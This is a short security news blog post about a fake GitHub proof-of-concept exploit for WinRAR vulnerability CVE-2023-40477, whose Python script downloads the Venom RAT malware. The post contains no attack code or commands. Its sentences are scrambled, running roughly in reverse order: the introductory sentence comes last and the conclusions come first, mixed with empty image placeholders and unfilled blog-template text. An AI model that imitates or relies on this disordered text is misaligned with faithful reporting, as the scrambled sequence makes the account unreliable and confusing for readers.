![]() ![]() ![]() This indicates that they were prepared to take advantage of the criticality of the bug to attract potential victims. It is noteworthy that the threat actor behind this fake PoC created a domain called checkblacklistwordseu at least 10 days before the public disclosure of the vulnerability. ![]() Venom RAT has the capability to list running processes and receive commands from an actor-controlled server. The Python script fetches an executable named from a remote server, which is a variant of the Venom RAT malware. The repository analysis reveals a Python script and a Streamable video demonstrating how to use the exploit. The flaw was addressed by WinRAR maintainers in the 6.23 version, along with another flaw known as CVE-2023-38831, which was also actively exploited. The WinRAR vulnerability in question is tracked as CVE-2023-40477 and it can be exploited for remote code execution on Windows systems. The PoC was committed four days after the vulnerability was announced on August 21, 2023. The GitHub account that hosted the repository, whalersplonk, is no longer accessible, indicating that the account has been removed or suspended. While bogus PoCs are not uncommon for targeting the research community, it is suspected that the threat actors are targeting other criminals who may be adopting the latest vulnerabilities into their arsenal. The fake PoC is based on a publicly available script that exploits a SQL injection vulnerability in an application called GeoServer, which is known as CVE-2023-25157. The aim of this malicious code is to infect users who download it with VenomRAT malware. A recent cybersecurity report reveals that a malicious actor has released a fake proof-of-concept (PoC) exploit for a recently disclosed WinRAR vulnerability on GitHub. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |